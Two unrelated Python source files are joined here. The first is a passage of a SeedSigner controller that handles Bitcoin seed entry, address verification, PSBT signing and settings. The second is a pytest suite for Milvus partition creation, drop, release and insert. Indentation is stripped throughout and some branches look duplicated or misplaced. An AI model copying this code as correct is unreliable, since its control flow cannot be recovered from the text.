self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# second QR scan; need the PSBT now
decoder = scan_qr("Scan PSBT QR")
if decoder.isComplete() and decoder.isPSBT():
# second QR must be a PSBT
self.menu_view.draw_modal(["Validating PSBT"])
psbt = decoder.getPSBT()
elif ( decoder.isComplete() and not decoder.isPSBT() ) or decoder.isInvalid():
self.menu_view.draw_modal(["Not a valid PSBT QR"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
return Path.MAIN_MENU
elif decoder.isComplete() and decoder.isAddress():
address = decoder.getAddress()
address_type = decoder.getAddressType()
self.menu_view.draw_address(address)
self.buttons.wait_for([B.KEY_RIGHT])
validate_network = NETWORKS[self.settings.network]
validate_network_text = self.settings.network
if "main" in address_type:
validate_network = NETWORKS["main"]
validate_network_text = "main"
elif "test" in address_type:
validate_network = NETWORKS["test"]
validate_network_text = "test"
r = 0
if address_type in ("Bech32-main", "Bech32-test") and len(address) == 62:
r = 2
else:
# check single sig vs multi sig address
r = self.menu_view.display_generic_selection_menu(["Single Sig Seed", "JSON Wallet Desc"], "Validate Bitcoin Address")
if r == 1:
# validate single sig using seed
# No valid seed yet; if there is a saved seed, ask to use it
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num == 0:
return Path.MAIN_MENU
seed = self.storage.get_seed(slot_num)
used_saved_seed = True
if not seed:
# no valid seed yet, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Cancel ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.MAIN_MENU
if not seed:
return Path.MAIN_MENU
# check if seed phrase is valid
self.menu_view.draw_modal(["Validating Seed ..."])
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if len(seed.passphrase) == 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# Ask to save seed
if self.storage.slot_avaliable() and used_saved_seed == False:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
#
# Validate if address from seed
#
# choose derivation standard
r = self.menu_view.display_generic_selection_menu(["Native Segwit", "Nested Segwit", "Custom"], "Derivation Path?")
if r == 1:
script_type = "native segwit"
elif r == 2:
script_type = "nested segwit"
elif r == 3:
script_type = "custom"
# calculate the derivation, or get a custom one from keyboard entry
if script_type == "custom":
derivation = self.settings_tools_view.draw_derivation_keyboard_entry(existing_derivation=self.settings.custom_derivation)
self.settings.custom_derivation = derivation # save for next time
else:
derivation = Settings.calc_derivation(validate_network_text, "single sig", script_type)
if derivation == "" or derivation == None:
self.menu_view.draw_modal(["Invalid Derivation", "try again"], "", "Right to Continue")
return Path.SEED_TOOLS_SUB_MENU
self.menu_view.draw_modal(["Checking Address", ""], "", "")
version = bip32.detect_version(derivation, default="xpub", network=validate_network)
root = bip32.HDKey.from_seed(seed.seed, version=validate_network["xprv"])
fingerprint = hexlify(root.child(0).fingerprint).decode('utf-8')
xprv = root.derive(derivation)
xpub = xprv.to_public()
for i in range(500):
r_pubkey = xpub.derive([0,i]).key
c_pubkey = xpub.derive([1,i]).key
recieve_address = ""
change_address = ""
if "P2PKH" in address_type:
recieve_address = script.p2pkh(r_pubkey).address(network=validate_network)
change_address = script.p2pkh(c_pubkey).address(network=validate_network)
elif "Bech32" in address_type:
recieve_address = script.p2wpkh(r_pubkey).address(network=validate_network)
change_address = script.p2wpkh(c_pubkey).address(network=validate_network)
elif "P2SH" in address_type:
recieve_address = script.p2sh(script.p2wpkh(r_pubkey)).address(network=validate_network)
change_address = script.p2sh(script.p2wpkh(c_pubkey)).address(network=validate_network)
if address == recieve_address:
self.menu_view.draw_modal(["Receive Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if address == change_address:
self.menu_view.draw_modal(["Change Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Checking Address "+str(i), "..."], "", "Right to Abort")
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
return Path.MAIN_MENU
if r == 2:
# second QR scan; need the wallet descriptor now
decoder2 = scan_qr("Scan Backup JSON QR")
if decoder2.isComplete() and decoder2.isWalletDescriptor():
desc_str = decoder2.getWalletDescriptor()
desc_str = desc_str.replace("\n","").replace(" ","")
try:
if len(re.findall (r'\[([0-9,a-f,A-F]+?)(\/[0-9,\/,h\']+?)\].*?(\/0\/\*)', desc_str)) > 0:
p = re.compile(r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h\']+?\].*?)(\/0\/\*)')
desc_str = p.sub(r'\1/{0,1}/*', desc_str)
elif len(re.findall (r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h,\']+?\][a-z,A-Z,0-9]*?)([\,,\)])', desc_str)) > 0:
p = re.compile(r'(\[[0-9,a-f,A-F]+?\/[0-9,\/,h,\']+?\][a-z,A-Z,0-9]*?)([\,,\)])')
desc_str = p.sub(r'\1/{0,1}/*\2', desc_str)
except:
desc_str = decoder2.getWalletDescriptor()
print(desc_str)
desc = Descriptor.from_string(desc_str)
else:
return Path.MAIN_MENU
#
# Validate if address from descriptor
#
for i in range(1000):
r_derived = desc.derive(i,branch_index=0)
c_derived = desc.derive(i,branch_index=1)
recieve_address = r_derived.address(validate_network)
change_address = c_derived.address(validate_network)
if address == recieve_address:
self.menu_view.draw_modal(["Recieved Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if address == change_address:
self.menu_view.draw_modal(["Change Address "+str(i), "Verified"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Checking Address "+str(i), "..."], "", "Right to Abort")
if self.buttons.check_for_low(B.KEY_RIGHT) or self.buttons.check_for_low(B.KEY_LEFT):
return Path.MAIN_MENU
elif ( decoder.isComplete() and not decoder.isPSBT() ) or decoder.isInvalid():
self.menu_view.draw_modal(["Not a valid PSBT QR"], "", "Right to Exit")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
else:
return Path.MAIN_MENU
if not seed:
# No valid seed yet; if there is a saved seed, ask to use it
if self.storage.num_of_saved_seeds() > 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Use Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,3,None)
if slot_num == 0:
return Path.MAIN_MENU
seed = self.storage.get_seed(slot_num)
used_saved_seed = True
if not seed:
# no valid seed yet, gather seed phrase
# display menu to select 12 or 24 word seed for last word
ret_val = self.menu_view.display_qr_12_24_word_menu("... [ Return to Main Menu ]")
if ret_val == Path.SEED_WORD_12:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(12)
elif ret_val == Path.SEED_WORD_24:
seed.mnemonic = self.seed_tools_view.display_manual_seed_entry(24)
elif ret_val == Path.SEED_WORD_QR:
seed.mnemonic = self.seed_tools_view.read_seed_phrase_qr()
else:
return Path.MAIN_MENU
if not seed:
return Path.MAIN_MENU
# check if seed phrase is valid
self.menu_view.draw_modal(["Validating Seed ..."])
if not seed:
self.menu_view.draw_modal(["Seed Invalid", "check seed phrase", "and try again"], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
if len(seed.passphrase) == 0:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Add Seed Passphrase?")
if r == 1:
# display a tool to pick letters/numbers to make a passphrase
seed.passphrase = self.seed_tools_view.draw_passphrase_keyboard_entry()
if len(seed.passphrase) == 0:
self.menu_view.draw_modal(["No passphrase added", "to seed words"], "", "Left to Exit, Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT])
if input == B.KEY_LEFT:
return Path.MAIN_MENU
else:
self.menu_view.draw_modal(["Optional passphrase", "added to seed words", seed.passphrase], "", "Right to Continue")
self.buttons.wait_for([B.KEY_RIGHT])
# display seed phrase
while True:
r = self.seed_tools_view.display_seed_phrase(seed.mnemonic_list, seed.passphrase, "Right to Continue")
if r == True:
break
else:
# Cancel
return Path.MAIN_MENU
# Ask to save seed
if self.storage.slot_avaliable() and used_saved_seed == False:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Save Seed?")
if r == 1: #Yes
slot_num = self.menu_view.display_saved_seed_menu(self.storage,2,None)
if slot_num in (1,2,3):
self.storage.add_seed(seed, slot_num)
self.menu_view.draw_modal(["Seed Valid", "Saved to Slot #" + str(slot_num)], "", "Right to Continue")
input = self.buttons.wait_for([B.KEY_RIGHT])
# show transaction information before sign
self.menu_view.draw_modal(["Parsing PSBT"])
p = PSBTParser(psbt,seed,self.settings.network)
self.signing_tools_view.display_transaction_information(p)
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT], False)
if input == B.KEY_LEFT:
return Path.MAIN_MENU
# Sign PSBT
self.menu_view.draw_modal(["PSBT Signing ..."])
sig_cnt = PSBTParser.sigCount(psbt)
psbt.sign_with(p.root)
trimmed_psbt = PSBTParser.trim(psbt)
if sig_cnt == PSBTParser.sigCount(trimmed_psbt):
self.menu_view.draw_modal(["Signing failed", "left to exit", "or right to continue", "to display PSBT QR"], "", "")
input = self.buttons.wait_for([B.KEY_RIGHT, B.KEY_LEFT], False)
if input == B.KEY_LEFT:
return Path.MAIN_MENU
# Display Animated QR Code
self.menu_view.draw_modal(["Generating PSBT QR ..."])
e = EncodeQR(psbt=trimmed_psbt, qr_type=self.settings.qr_psbt_type, qr_density=self.settings.qr_density, wordlist=self.settings.wordlist)
while True:
cur_time = int(time.time() * 1000)
if cur_time - self.buttons.last_input_time > self.screensaver_activation_ms and not self.screensaver.is_running:
self.start_screensaver()
self.buttons.update_last_input_time()
else:
image = e.nextPartImage(240,240,1,background=self.current_bg_qr_color)
View.DispShowImage(image)
time.sleep(0.05)
if self.buttons.check_for_low(B.KEY_RIGHT):
break
elif self.buttons.check_for_low(B.KEY_UP):
self.prev_qr_background_color()
elif self.buttons.check_for_low(B.KEY_DOWN):
self.next_qr_background_color()
# Return to Main Menu
return Path.MAIN_MENU
###
### Settings Tools Navigation/Launcher
###
#### Show IO Test
def show_io_test_tool(self):
ret_val = True
ret_val = self.io_test_view.display_io_test_screen()
if ret_val == True:
return Path.SETTINGS_SUB_MENU
### Show Current Network
def show_current_network_tool(self):
r = self.settings_tools_view.display_current_network()
if r is not None:
self.settings.network = r
return Path.SETTINGS_SUB_MENU
### Show Wallet Selection Tool
def show_wallet_tool(self):
r = self.settings_tools_view.display_wallet_selection()
if r is not None:
self.settings.software = r
return Path.SETTINGS_SUB_MENU
### Show QR Density Tool
def show_qr_density_tool(self):
r = self.settings_tools_view.display_qr_density_selection()
if r in (EncodeQRDensity.LOW, EncodeQRDensity.MEDIUM, EncodeQRDensity.HIGH):
self.settings.qr_density = r
return Path.SETTINGS_SUB_MENU
### Show Version Info
def show_version_info(self):
self.settings_tools_view.display_version_info()
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_LEFT:
return Path.SETTINGS_SUB_MENU
elif input == B.KEY_RIGHT:
return Path.SETTINGS_SUB_MENU
### Show Persistent Settings Screen
def show_persistent_settings_tool(self):
r = self.settings_tools_view.display_persistent_settings()
if r is not None:
if r == True:
self.menu_view.draw_modal(["Persistent settings", "keeps settings saved", "across reboot.", "Seeds are never saved"], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
self.settings.persistent = r
else:
self.menu_view.draw_modal(["This will restore", "the default", "settings.", ""], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
self.settings.persistent = r
return Path.SETTINGS_SUB_MENU
### next_qr_background_color()
def next_qr_background_color(self):
if self.current_bg_qr_color == "FFFFFF":
self.current_bg_qr_color = "DDDDDD"
elif self.current_bg_qr_color == "DDDDDD":
self.current_bg_qr_color = "BBBBBB"
elif self.current_bg_qr_color == "BBBBBB":
self.current_bg_qr_color = "999999"
elif self.current_bg_qr_color == "999999":
self.current_bg_qr_color = "777777"
elif self.current_bg_qr_color == "777777":
self.current_bg_qr_color = "555555"
elif self.current_bg_qr_color == "555555":
self.current_bg_qr_color = "333333"
elif self.current_bg_qr_color == "333333":
self.current_bg_qr_color = "FFFFFF"
self.settings.qr_background_color = self.current_bg_qr_color
### prev_qr_background_color()
def prev_qr_background_color(self):
if self.current_bg_qr_color == "333333":
self.current_bg_qr_color = "555555"
elif self.current_bg_qr_color == "555555":
self.current_bg_qr_color = "777777"
elif self.current_bg_qr_color == "777777":
self.current_bg_qr_color = "999999"
elif self.current_bg_qr_color == "999999":
self.current_bg_qr_color = "BBBBBB"
elif self.current_bg_qr_color == "BBBBBB":
self.current_bg_qr_color = "DDDDDD"
elif self.current_bg_qr_color == "DDDDDD":
self.current_bg_qr_color = "FFFFFF"
elif self.current_bg_qr_color == "FFFFFF":
self.current_bg_qr_color = "333333"
self.settings.qr_background_color = self.current_bg_qr_color
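# A hedged alternative sketch (not wired in): the same rotation could be
# table-driven, deriving next/prev from a single ordered list so the two
# methods cannot drift apart. _QR_BG_COLORS below is hypothetical:
# _QR_BG_COLORS = ["FFFFFF", "DDDDDD", "BBBBBB", "999999", "777777", "555555", "333333"]
# def next_qr_background_color(self):
#     i = self._QR_BG_COLORS.index(self.current_bg_qr_color)
#     self.current_bg_qr_color = self._QR_BG_COLORS[(i + 1) % len(self._QR_BG_COLORS)]
#     self.settings.qr_background_color = self.current_bg_qr_color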
### Show Camera Rotation Tool
def show_camera_rotation_tool(self):
r = self.settings_tools_view.display_camera_rotation()
if r is not None:
self.settings.camera_rotation = r
return Path.SETTINGS_SUB_MENU
### Show Donate Screen and QR
def show_donate_tool(self):
self.settings_tools_view.display_donate_info_screen()
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_LEFT:
return Path.SETTINGS_SUB_MENU
elif input == B.KEY_RIGHT:
self.settings_tools_view.display_donate_qr()
time.sleep(1)
input = self.buttons.wait_for([B.KEY_RIGHT])
return Path.MAIN_MENU
def show_reset_tool(self):
self.menu_view.draw_modal(["This will restore", "default settings and", "restart the app", ""], "Warning", "Right to Continue")
input = self.buttons.wait_for([B.KEY_LEFT, B.KEY_RIGHT])
if input == B.KEY_RIGHT:
r = self.menu_view.display_generic_selection_menu(["Yes", "No"], "Reset SeedSigner?")
if r == 1: #Yes
self.menu_view.display_blank_screen()
self.settings.restoreDefault()
time.sleep(0.1) # give time to write to disk
return_code = os.system("sudo systemctl is-active --quiet seedsigner.service")
if return_code == 0:
# systemd service is running
call("sudo systemctl restart seedsigner.service", shell=True)
time.sleep(2)
else:
# systemd service is not running, restart script internally
os.execv(sys.executable, ['python3'] + sys.argv)
else: # No
return Path.MAIN_MENU
return Path.MAIN_MENU
|
test_partition.py | import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_unique_str(prefix), cf.gen_unique_str("desc_"))])
def test_partition_default(self, partition_name, description):
"""
target: verify create a partition
method: 1. create a partition
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
# @pytest.mark.xfail(reason="issue #5375")
@pytest.mark.parametrize("partition_name", [""])
def test_partition_empty_name(self, partition_name):
"""
target: verify create a partition with empty name
method: 1. create a partition with an empty name
expected: 1. raise exception
"""
# create a collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description", [(cf.gen_unique_str(prefix), "")])
def test_partition_empty_description(self, partition_name, description):
"""
target: verify create a partition with empty description
method: 1. create a partition with empty description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, description",
[(cf.gen_str_by_length(255), cf.gen_str_by_length(2048))])
def test_partition_max_description_length(self, partition_name, description):
"""
target: verify create a partition with 255 length name and 2048 length description
method: 1. create a partition with 255 length name and 2048 length description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection_name, partition_name, description",
[(cf.gen_unique_str(), cf.gen_unique_str(prefix), cf.gen_unique_str())])
def test_partition_dup_name(self, collection_name, partition_name, description):
"""
target: verify create partitions with duplicate name
method: 1. create partitions with duplicate name
expected: 1. create successfully
2. the same partition returned with different object ids
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_special_chars_description(self, partition_name, description):
"""
target: verify create a partition with special characters in description
method: 1. create a partition with special characters in description
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: 1. the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_str_by_length(256)])
def test_partition_maxlength_name(self, partition_name):
"""
target: verify create a partition with maxlength(256) name
method: 1. create a partition with max length names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: 1. create a partition with invalid names
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
    # TODO: needs an error code (issue #5144) to assert on independently
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_none_collection(self, partition_name):
"""
target: verify create a partition with none collection
method: 1. create a partition with none collection
expected: 1. raise exception
"""
# create partition with collection is None
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus_orm.Collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop(self, partition_name):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: 1. drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
        # check that the partition does not exist
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("search_vectors", [cf.gen_vectors(1, ct.default_dim)])
def test_partition_release(self, search_vectors):
"""
        target: verify release partition
        method: 1. create a collection and two partitions
                2. insert data into each partition
                3. load and search both partitions
                4. release partition1
                5. search both partitions again
        expected: 1. search on the released partition raises an exception
                  2. the other partition is still searchable
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
        # insert data into the two partitions
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, partition_name, data):
"""
        target: verify insert multiple entities by dataFrame/list/tuple
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: 1. insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
""" Test case of partition interface in operations """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_dropped_collection(self, partition_name):
"""
target: verify create partition against a dropped collection
method: 1. create collection1
2. drop collection1
3. create partition in collection1
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# drop collection
collection_w.drop()
        # creating a partition should fail
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_same_name_in_diff_collections(self, partition_name):
"""
target: verify create partitions with same name in diff collections
method: 1. create a partition in collection1
2. create a partition in collection2
expected: 1. create successfully
"""
# create two collections
collection_w1 = self.init_collection_wrap()
collection_w2 = self.init_collection_wrap()
# create 2 partitions in 2 diff collections
self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
# check result
assert collection_w1.has_partition(partition_name)[0]
assert collection_w2.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_multi_partitions_in_collection(self):
"""
target: verify create multiple partitions in one collection
method: 1. create multiple partitions in one collection
expected: 1. create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
for _ in range(10):
partition_name = cf.gen_unique_str(prefix)
# create partition with different names and check the partition exists
self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_partition_maximum_partitions(self):
"""
target: verify create maximum partitions
method: 1. create maximum partitions
2. create one more partition
expected: 1. raise exception
"""
threads_num = 8
threads = []
def create_partition(collection, threads_n):
for _ in range(ct.max_partition_num // threads_n):
name = cf.gen_unique_str(prefix)
par_wrap = ApiPartitionWrapper()
par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
collection_w = self.init_collection_wrap()
for _ in range(threads_num):
t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
p_name = cf.gen_unique_str()
self.partition_wrap.init_partition(
collection_w.collection, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "maximum partition's number should be limit to 4096"})
@pytest.mark.tags(CaseLabel.L0)
def test_partition_drop_default_partition(self):
"""
target: verify drop the _default partition
method: 1. drop the _default partition
expected: 1. raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
default_partition, _ = collection_w.partition(ct.default_partition_name)
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert default_partition.name == partition_w.name
# verify that drop partition with error
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_partition_twice(self, partition_name):
"""
target: verify drop the same partition twice
        method: 1. create a partition with default schema
                2. drop the partition
                3. drop the same partition again
        expected: raise exception on the 2nd drop
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
collection_w.has_partition(partition_name)
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
        # verify that dropping the partition again raises an exception
partition_w.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_create_and_drop_multi_times(self, partition_name):
"""
        target: verify create and drop multiple times
        method: 1. create a partition with default schema
                2. drop the partition
                3. repeat #1 and #2 several times
        expected: create and drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
        # repeat 5 times
for i in range(5):
# create partition and check that the partition exists
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
            # drop partition and check that the partition does not exist
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_drop_non_empty_partition(self, partition_name):
"""
target: verify drop a partition which has data inserted
